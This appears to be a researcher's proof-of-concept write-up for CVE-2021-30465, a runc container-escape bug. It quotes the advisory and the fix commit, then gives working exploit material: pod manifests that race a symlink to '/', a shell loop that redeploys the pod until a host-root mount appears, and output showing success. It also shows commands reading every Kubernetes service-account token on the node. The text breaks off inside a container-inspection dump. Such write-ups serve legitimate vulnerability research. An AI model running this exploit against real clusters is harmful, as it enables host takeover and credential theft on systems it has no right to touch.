# CVE-2021-30465 POC [GH link](https://github.com/opencontainers/runc/security/advisories/GHSA-c3xm-pvg7-gh7r) [tests](https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f#diff-f977f682b614fc29b524adc972c348f0af9f88e3a874dfc0b28e3625a4f878bb) ``` go func TestStripRoot(t *testing.T) { for _, test := range []struct { root, path, out string }{ // Works with multiple components. {"/a/b", "/a/b/c", "/c"}, {"/hello/world", "/hello/world/the/quick-brown/fox", "/the/quick-brown/fox"}, // '/' must be a no-op. {"/", "/a/b/c", "/a/b/c"}, // Must be the correct order. {"/a/b", "/a/c/b", "/a/c/b"}, // Must be at start. {"/abc/def", "/foo/abc/def/bar", "/foo/abc/def/bar"}, // Must be a lexical parent. {"/foo/bar", "/foo/barSAMECOMPONENT", "/foo/barSAMECOMPONENT"}, // Must only strip the root once. {"/foo/bar", "/foo/bar/foo/bar/baz", "/foo/bar/baz"}, // Deal with .. in a fairly sane way. {"/foo/bar", "/foo/bar/../baz", "/foo/baz"}, {"/foo/bar", "../../../../../../foo/bar/baz", "/baz"}, {"/foo/bar", "/../../../../../../foo/bar/baz", "/baz"}, {"/foo/bar/../baz", "/foo/baz/bar", "/bar"}, {"/foo/bar/../baz", "/foo/baz/../bar/../baz/./foo", "/foo"}, // All paths are made absolute before stripping. {"foo/bar", "/foo/bar/baz/bee", "/baz/bee"}, {"/foo/bar", "foo/bar/baz/beef", "/baz/beef"}, {"foo/bar", "foo/bar/baz/beets", "/baz/beets"}, } { got := stripRoot(test.root, test.path) if got != test.out { t.Errorf("stripRoot(%q, %q) -- got %q, expected %q", test.root, test.path, got, test.out) } } } ``` Text from the CVE: ``` However, it turns out with some container orchestrators (such as Kubernetes -- though it is very likely that other downstream users of runc could have similar behaviour be accessible to untrusted users), the existence of additional volume management infrastructure allows this attack to be applied to gain access to the host filesystem without requiring the attacker to have completely arbitrary control over container configuration. In the case of Kubernetes, this is exploitable by creating a symlink in a volume to the top-level (well-known) directory where volumes are sourced from (for instance, `/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir`), and then using that symlink as the target of a mount. The source of the mount is an attacker controlled directory, and thus the source directory from which subsequent mounts will occur is an attacker-controlled directory. Thus the attacker can first place a symlink to `/` in their malicious source directory with the name of a volume, and a subsequent mount in the container will bind-mount `/` into the container. Applying this attack requires the attacker to start containers with a slightly peculiar volume configuration (though not explicitly malicious-looking such as bind-mounting `/` into the container explicitly), and be able to run malicious code in a container that shares volumes with said volume configuration. It helps the attacker if the host paths used for volume management are well known, though this is not a hard requirement. ``` Text from [commit](https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f#diff-f977f682b614fc29b524adc972c348f0af9f88e3a874dfc0b28e3625a4f878bb) ``` rootfs: add mount destination validation Because the target of a mount is inside a container (which may be a volume that is shared with another container), there exists a race condition where the target of the mount may change to a path containing a symlink after we have sanitised the path -- resulting in us inadvertently mounting the path outside of the container. This is not immediately useful because we are in a mount namespace with MS_SLAVE mount propagation applied to "/", so we cannot mount on top of host paths in the host namespace. However, if any subsequent mountpoints in the configuration use a subdirectory of that host path as a source, those subsequent mounts will use an attacker-controlled source path (resolved within the host rootfs) -- allowing the bind-mounting of "/" into the container. While arguably configuration issues like this are not entirely within runc's threat model, within the context of Kubernetes (and possibly other container managers that provide semi-arbitrary container creation privileges to untrusted users) this is a legitimate issue. Since we cannot block mounting from the host into the container, we need to block the first stage of this attack (mounting onto a path outside the container). The long-term plan to solve this would be to migrate to libpathrs, but as a stop-gap we implement libpathrs-like path verification through readlink(/proc/self/fd/$n) and then do mount operations through the procfd once it's been verified to be inside the container. The target could move after we've checked it, but if it is inside the container then we can assume that it is safe for the same reason that libpathrs operations would be safe. A slight wrinkle is the "copyup" functionality we provide for tmpfs, which is the only case where we want to do a mount on the host filesystem. To facilitate this, I split out the copy-up functionality entirely so that the logic isn't interspersed with the regular tmpfs logic. In addition, all dependencies on m.Destination being overwritten have been removed since that pattern was just begging to be a source of more mount-target bugs (we do still have to modify m.Destination for tmpfs-copyup but we only do it temporarily). Fixes: CVE-2021-30465 Reported-by: Etienne Champetier <champetier.etienne@gmail.com> Co-authored-by: Noah Meyerhans <nmeyerha@amazon.com> Reviewed-by: Samuel Karp <skarp@amazon.com> Reviewed-by: Kir Kolyshkin <kolyshkin@gmail.com> (@kolyshkin) Reviewed-by: Akihiro Suda <akihiro.suda.cz@hco.ntt.co.jp> Signed-off-by: Aleksa Sarai <cyphar@cyphar.com> ``` Dev Setup is a kind cluster ``` yaml $▶ kind version kind v0.11.0 go1.16.3 darwin/amd64 $▶ docker exec -ti kind-control-plane bash root@kind-control-plane:/# runc --version runc version 1.0.0-rc94 commit: 2c7861bc5e1b3e756392236553ec14a78a09f8bf spec: 1.0.2-dev go: go1.16.4 libseccomp: 2.5.1 root@kind-control-plane:/# ``` Second dev setup ``` $ kind version kind v0.8.1 go1.14.2 darwin/amd64 $ docker exec -ti kind-control-plane bash root@kind-control-plane:/# runc --version runc version 1.0.0-rc10 spec: 1.0.1-dev ``` ## Theory 1. This requires two different deployments that each target the same "mount point" First deployment mounts and creates a symlink of at a well defined place in the nodes fs. Second deployment mounts and follows the symlink to exploit town. ## Theory 2 This is a single pod spec with multiple volumes much like [subpath exploit](https://github.com/bgeesaman/subpath-exploit/blob/master/exploit-pod.yaml) but with different symlink targets: one that satisfies the "inside the container" check but has something else going for it that lets the second mount follow it back. ## Hacks learn underlying host path for volume that is shared. ``` grep empty /proc/1/task/1/mountinfo 1427 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/kubernetes.io~empty-dir/escape-volume/host /rootfs rw,relatime - ext4 /dev/vda1 rw 1428 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/kubernetes.io~empty-dir/status-volume /status rw,relatime - ext4 /dev/vda1 rw ``` ## Symlink race [symlink_race](https://github.com/R-Niagra/Container_CVEs/tree/6f87abdc5031ac481f89904f6bb37f278c4d0ed2/cve-2018-15664) pushed a symlink example container here: mauilion/symlinks:push ## From Etienne ``` My exploit uses: 1) multiple containers 2) empty dir volumes / tmpfs (but some other types are likely usable) 3) mount into mounts, ie volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt2 If you can forbid mount into mounts you prevent this attack Don't hesitate to ping me in public issue if needed ``` # more hacks. ## initial attempt ``` yaml --- apiVersion: v1 kind: Pod metadata: name: honk spec: containers: - image: nginx:stable name: prehonk imagePullPolicy: "IfNotPresent" command: ["/bin/bash"] args: ["-xc", "cd /mnt1 && ln -s / mnt2 "] volumeMounts: - mountPath: /mnt1 name: test1 - image: nginx:stable name: exploit imagePullPolicy: "IfNotPresent" command: ["/bin/bash"] args: ["-c", "sleep infinity"] volumeMounts: - mountPath: /test1/mnt2 name: test2 - mountPath: /test1 name: test1 volumes: - name: test1 emptyDir: {} - name: test2 emptyDir: {} ``` ``` yaml --- apiVersion: v1 kind: Pod metadata: name: honk spec: initContainers: - image: nginx:stable name: prehonk imagePullPolicy: "IfNotPresent" command: ["/bin/bash"] args: ["-xc", "mkdir -p $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape-volume//) && cd /rootfs && ln -s / $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape/status/)"] volumeMounts: - mountPath: /rootfs name: escape-volume containers: - image: nginx:stable name: exploitj imagePullPolicy: "IfNotPresent" command: ["/bin/bash"] args: ["-c", "sleep infinity"] volumeMounts: - mountPath: /rootfs/status name: escape-volume volumes: - name: escape-volume emptyDir: {} - name: status-volume emptyDir: {} ``` trick to grab logs for failed pod on the host this grabs the recently exited prehonk container and grabs the logs from it. ``` bash root@kind-control-plane:/> crictl logs $(crictl ps -a | grep prehonk | awk '{print $1}') + cd /mnt1 + ln -s / mnt2 ln: failed to create symbolic link 'mnt2/': File exists ``` Working exploit code: ``` yaml # honk-pod.yaml --- apiVersion: v1 kind: Pod metadata: name: honk spec: #securityContext: #runAsUser: 1000 #runAsGroup: 1000 containers: - image: nginx:latest imagePullPolicy: IfNotPresent name: 0-link0 command: ["/bin/bash"] args: ["-xc", "cd /honk; while true; do rm -rf host; ln -s / host; done;"] volumeMounts: - mountPath: /honk name: escape-volume - image: nginx:latest imagePullPolicy: Always name: 1-honk command: ["sleep", "infinity"] volumeMounts: - mountPath: /honk name: escape-volume - mountPath: /honk/host name: host-volume - image: nginx:latest imagePullPolicy: Always name: 2-honk command: ["sleep", "infinity"] volumeMounts: - mountPath: /honk name: escape-volume - mountPath: /honk/host name: host-volume - image: nginx:latest imagePullPolicy: Always name: 3-honk command: ["sleep", "infinity"] volumeMounts: - mountPath: /honk name: escape-volume - mountPath: /honk/host name: host-volume volumes: - name: escape-volume emptyDir: {} - name: host-volume emptyDir: {} ``` ``` bash $ honk.sh #!/usr/bin/env bash RUNS=1 while [ $RUNS -lt 100 ]; do kubectl delete -f honk-pod.yaml --grace-period=0 --force 2> /dev/null sleep 3 kubectl apply -f honk-pod.yaml kubectl wait -f honk-pod.yaml --for condition=Ready --timeout=30s 2> /dev/null COUNTER=1 while [ $COUNTER -lt 4 ]; do echo -n "Checking $COUNTER-honk for the host mount..." # count the pid directories on the host if there are more than 5 # we have a success. if [[ "$(kubectl exec -it honk -c $COUNTER-honk -- find /proc -maxdepth 1 ! -name '*[!0-9]*' 2>/dev/null | wc -l)" -gt 5 ]]; then # GKE #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- /home/kubernetes/bin/crictl ps 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then # Kind #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- runc list 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then # Civo/k3s #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- k3s -v 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then echo "SUCCESS after $RUNS runs!" echo "Run kubectl exec -it honk -c $COUNTER-honk -- bash" exit 0 else echo "nope." fi let COUNTER=$COUNTER+1 done let RUNS=$RUNS+1 done ``` ```terminal $ ./honk.sh pod "honk" force deleted pod/honk created pod/honk condition met Checking 1-honk for the host mount...nope. Checking 2-honk for the host mount...nope. Checking 3-honk for the host mount...nope. ...snip... pod "honk" force deleted pod/honk created pod/honk condition met Checking 1-honk for the host mount...nope. Checking 2-honk for the host mount...nope. Checking 3-honk for the host mount...nope. pod "honk" force deleted pod/honk created pod/honk condition met Checking 1-honk for the host mount...nope. Checking 2-honk for the host mount...nope. Checking 3-honk for the host mount...SUCCESS after 22 runs! Run kubectl exec -it honk -c 3-honk -- bash ``` By seeing `/run/runc` in in the exploit container, we know we have a hostpath mount working because that path only exists on the underlying node and not inside our nginx container. This *may* vary per target, but it's easy enough to adjust if needed. ```bash $ kubectl exec -it exploit -c 3-honk -- bash root@honk:/# ls bin boot dev etc home kind lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var root@honk:/# ``` ```bash $ kubectl exec -it exploit -c 3-honk -- crictl ps CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID f354220ae48d3 f0b8a9a541369 8 minutes ago Running 3-honk 2 d6cfcd0c10c43 847a2f406e30f f0b8a9a541369 8 minutes ago Running 2-honk 0 d6cfcd0c10c43 7d6994acef655 f0b8a9a541369 8 minutes ago Running 1-honk 0 d6cfcd0c10c43 36ac6b9ef00d0 f0b8a9a541369 8 minutes ago Running 0-link 0 d6cfcd0c10c43 c672feb53eaa9 e422121c9c5f9 18 hours ago Running local-path-provisioner 0 aedc00f117150 8a3fea897c809 bfe3a36ebd252 18 hours ago Running coredns 0 cbda6967dd1f7 afe11ac87a75e bfe3a36ebd252 18 hours ago Running coredns 0 6f26d4dcd0e2e 79d5da0a84ef1 6b17089e24fdb 18 hours ago Running kindnet-cni 0 8539b3556a14b e9b44cb76c812 23b52beab6e55 18 hours ago Running kube-proxy 0 815a6a9064842 c80612e8c9e52 0369cf4303ffd 18 hours ago Running etcd 0 0563e084fe6ee 09ef10a38b9e8 51dc9758caa7b 18 hours ago Running kube-controller-manager 0 c566b807c748b d0f8fb646cd32 3ad0575b6f104 18 hours ago Running kube-apiserver 0 327abdbfe5320 396e975f0500a cd40419687469 18 hours ago Running kube-scheduler 0 950216aec91d8 ``` ```bash root@honk:/# amicontained Container Runtime: docker Has Namespaces: pid: true user: false AppArmor Profile: unconfined Capabilities: BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap Seccomp: disabled Blocked Syscalls (20): MSGRCV SYSLOG SETSID VHANGUP PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE BPF Looking for Docker.sock ``` ```bash # find -L /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -print -exec cat {} \; | sed -e 's/\/var/\r\n\/var/g'; /var/lib/kubelet/pods/05415399-22a8-4203-935f-fb7ff6662d01/volumes/kubernetes.io~secret/kindnet-token-49xqw/token eyJhbGciO... /var/lib/kubelet/pods/339bd96c-a6c9-434e-8cbf-41450eeeebd8/volumes/kubernetes.io~secret/kube-proxy-token-krck6/token eyJhbGciO... /var/lib/kubelet/pods/64ca5b3b-c68b-4ca9-b85e-c0304ba691c8/volumes/kubernetes.io~secret/coredns-token-vh96r/token eyJhbGciO... /var/lib/kubelet/pods/74a4d033-f7f3-4f86-88e6-88bd9266de17/volumes/kubernetes.io~secret/local-path-provisioner-service-account-token-5gvlp/token eyJhbGciO... /var/lib/kubelet/pods/7691bf45-3159-4f40-b054-f52144871e5b/volumes/kubernetes.io~secret/coredns-token-vh96r/token eyJhbGciO... /var/lib/kubelet/pods/b50b2a73-9265-4090-9b27-1d5d2cf00942/volumes/kubernetes.io~secret/default-token-bxhkj/token eyJhbGciO... ``` Inspect an exploited container from the host ```json # crictl inspect e1e8927a546a6 { "status": { "id": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220", "metadata": { "attempt": 0, "name": "2-exploit" }, "state": "CONTAINER_RUNNING", "createdAt": "2021-05-21T00:52:20.8831732Z", "startedAt": "2021-05-21T00:52:21.0110818Z", "finishedAt": "1970-01-01T00:00:00Z", "exitCode": 0, "image": { "annotations": {}, "image": "docker.io/library/nginx:latest" }, "imageRef": "docker.io/library/nginx@sha256:df13abe416e37eb3db4722840dd479b00ba193ac6606e7902331dcea50f4f1f2", "reason": "", "message": "", "labels": { "io.kubernetes.container.name": "2-exploit", "io.kubernetes.pod.name": "exploit", "io.kubernetes.pod.namespace": "default", "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3" }, "annotations": { "io.kubernetes.container.hash": "b5a5fa", "io.kubernetes.container.restartCount": "0", "io.kubernetes.container.terminationMessagePath": "/dev/termination-log", "io.kubernetes.container.terminationMessagePolicy": "File", "io.kubernetes.pod.terminationGracePeriod": "30" }, "mounts": [ { "containerPath": "/rootfs", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/rootfs/host", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/var/run/secrets/kubernetes.io/serviceaccount", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "propagation": "PROPAGATION_PRIVATE", "readonly": true, "selinuxRelabel": false }, { "containerPath": "/etc/hosts", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/dev/termination-log", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false } ], "logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/2-exploit/0.log" }, "info": { "sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8", "pid": 2894296, "removing": false, "snapshotKey": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220", "snapshotter": "overlayfs", "runtimeType": "io.containerd.runc.v2", "runtimeOptions": null, "config": { "metadata": { "name": "2-exploit" }, "image": { "image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6" }, "command": [ "sleep", "infinity" ], "envs": [ { "key": "KUBERNETES_PORT_443_TCP_ADDR", "value": "10.96.0.1" }, { "key": "KUBERNETES_SERVICE_HOST", "value": "10.96.0.1" }, { "key": "KUBERNETES_SERVICE_PORT", "value": "443" }, { "key": "KUBERNETES_SERVICE_PORT_HTTPS", "value": "443" }, { "key": "KUBERNETES_PORT", "value": "tcp://10.96.0.1:443" }, { "key": "KUBERNETES_PORT_443_TCP", "value": "tcp://10.96.0.1:443" }, { "key": "KUBERNETES_PORT_443_TCP_PROTO", "value": "tcp" }, { "key": "KUBERNETES_PORT_443_TCP_PORT", "value": "443" } ], "mounts": [ { "container_path": "/rootfs", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume" }, { "container_path": "/rootfs/host", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume" }, { "container_path": "/var/run/secrets/kubernetes.io/serviceaccount", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "readonly": true }, { "container_path": "/etc/hosts", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts" }, { "container_path": "/dev/termination-log", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a" } ], "labels": { "io.kubernetes.container.name": "2-exploit", "io.kubernetes.pod.name": "exploit", "io.kubernetes.pod.namespace": "default", "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3" }, "annotations": { "io.kubernetes.container.hash": "b5a5fa", "io.kubernetes.container.restartCount": "0", "io.kubernetes.container.terminationMessagePath": "/dev/termination-log", "io.kubernetes.container.terminationMessagePolicy": "File", "io.kubernetes.pod.terminationGracePeriod": "30" }, "log_path": "2-exploit/0.log", "linux": { "resources": { "cpu_period": 100000, "cpu_shares": 2, "oom_score_adj": 1000, "hugepage_limits": [ { "page_size": "1GB" }, { "page_size": "2MB" } ] }, "security_context": { "namespace_options": { "pid": 1 }, "run_as_user": {}, "masked_paths": [ "/proc/acpi", "/proc/kcore", "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", "/proc/scsi", "/sys/firmware" ], "readonly_paths": [ "/proc/asound", "/proc/bus", "/proc/fs", "/proc/irq", "/proc/sys", "/proc/sysrq-trigger" ] } } }, "runtimeSpec": { "ociVersion": "1.0.2-dev", "process": { "user": { "uid": 0, "gid": 0 }, "args": [ "sleep", "infinity" ], "env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=exploit", "NGINX_VERSION=1.19.10", "NJS_VERSION=0.5.3", "PKG_RELEASE=1~buster", "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1", "KUBERNETES_SERVICE_HOST=10.96.0.1", "KUBERNETES_SERVICE_PORT=443", "KUBERNETES_SERVICE_PORT_HTTPS=443", "KUBERNETES_PORT=tcp://10.96.0.1:443", "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443", "KUBERNETES_PORT_443_TCP_PROTO=tcp", "KUBERNETES_PORT_443_TCP_PORT=443" ], "cwd": "/", "capabilities": { "bounding": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "effective": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "inheritable": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "permitted": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ] }, "oomScoreAdj": 1000 }, "root": { "path": "rootfs" }, "mounts": [ { "destination": "/proc", "type": "proc", "source": "proc", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": [ "nosuid", "strictatime", "mode=755", "size=65536k" ] }, { "destination": "/dev/pts", "type": "devpts", "source": "devpts", "options": [ "nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5" ] }, { "destination": "/dev/mqueue", "type": "mqueue", "source": "mqueue", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/sys", "type": "sysfs", "source": "sysfs", "options": [ "nosuid", "noexec", "nodev", "ro" ] }, { "destination": "/sys/fs/cgroup", "type": "cgroup", "source": "cgroup", "options": [ "nosuid", "noexec", "nodev", "relatime", "ro" ] }, { "destination": "/rootfs", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/rootfs/host", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/hosts", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/dev/termination-log", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/hostname", "type": "bind", "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/resolv.conf", "type": "bind", "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/dev/shm", "type": "bind", "source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/var/run/secrets/kubernetes.io/serviceaccount", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "options": [ "rbind", "rprivate", "ro" ] } ], "annotations": { "io.kubernetes.cri.container-name": "2-exploit", "io.kubernetes.cri.container-type": "container", "io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8" }, "linux": { "resources": { "devices": [ { "allow": false, "access": "rwm" } ], "memory": {}, "cpu": { "shares": 2, "period": 100000 } }, "cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220", "namespaces": [ { "type": "pid" }, { "type": "ipc", "path": "/proc/2893298/ns/ipc" }, { "type": "uts", "path": "/proc/2893298/ns/uts" }, { "type": "mount" }, { "type": "network", "path": "/proc/2893298/ns/net" } ], "maskedPaths": [ "/proc/acpi", "/proc/kcore", "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", "/proc/scsi", "/sys/firmware" ], "readonlyPaths": [ "/proc/asound", "/proc/bus", "/proc/fs", "/proc/irq", "/proc/sys", "/proc/sysrq-trigger" ] } } } } ``` Inspect a non-exploited container ```json # crictl inspect addfd289b2769 { "status": { "id": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060", "metadata": { "attempt": 0, "name": "1-exploit" }, "state": "CONTAINER_RUNNING", "createdAt": "2021-05-21T00:52:20.4450061Z", "startedAt": "2021-05-21T00:52:20.6401701Z", "finishedAt": "1970-01-01T00:00:00Z", "exitCode": 0, "image": { "annotations": {}, "image": "docker.io/library/nginx:latest" }, "imageRef": "docker.io/library/nginx@sha256:df13abe416e37eb3db4722840dd479b00ba193ac6606e7902331dcea50f4f1f2", "reason": "", "message": "", "labels": { "io.kubernetes.container.name": "1-exploit", "io.kubernetes.pod.name": "exploit", "io.kubernetes.pod.namespace": "default", "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3" }, "annotations": { "io.kubernetes.container.hash": "7a407414", "io.kubernetes.container.restartCount": "0", "io.kubernetes.container.terminationMessagePath": "/dev/termination-log", "io.kubernetes.container.terminationMessagePolicy": "File", "io.kubernetes.pod.terminationGracePeriod": "30" }, "mounts": [ { "containerPath": "/rootfs", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/rootfs/host", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/var/run/secrets/kubernetes.io/serviceaccount", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "propagation": "PROPAGATION_PRIVATE", "readonly": true, "selinuxRelabel": false }, { "containerPath": "/etc/hosts", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/dev/termination-log", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false } ], "logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/1-exploit/0.log" }, "info": { "sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8", "pid": 2893952, "removing": false, "snapshotKey": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060", "snapshotter": "overlayfs", "runtimeType": "io.containerd.runc.v2", "runtimeOptions": null, "config": { "metadata": { "name": "1-exploit" }, "image": { "image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6" }, "command": [ "sleep", "infinity" ], "envs": [ { "key": "KUBERNETES_PORT_443_TCP_ADDR", "value": "10.96.0.1" }, { "key": "KUBERNETES_SERVICE_HOST", "value": "10.96.0.1" }, { "key": "KUBERNETES_SERVICE_PORT", "value": "443" }, { "key": "KUBERNETES_SERVICE_PORT_HTTPS", "value": "443" }, { "key": "KUBERNETES_PORT", "value": "tcp://10.96.0.1:443" }, { "key": "KUBERNETES_PORT_443_TCP", "value": "tcp://10.96.0.1:443" }, { "key": "KUBERNETES_PORT_443_TCP_PROTO", "value": "tcp" }, { "key": "KUBERNETES_PORT_443_TCP_PORT", "value": "443" } ], "mounts": [ { 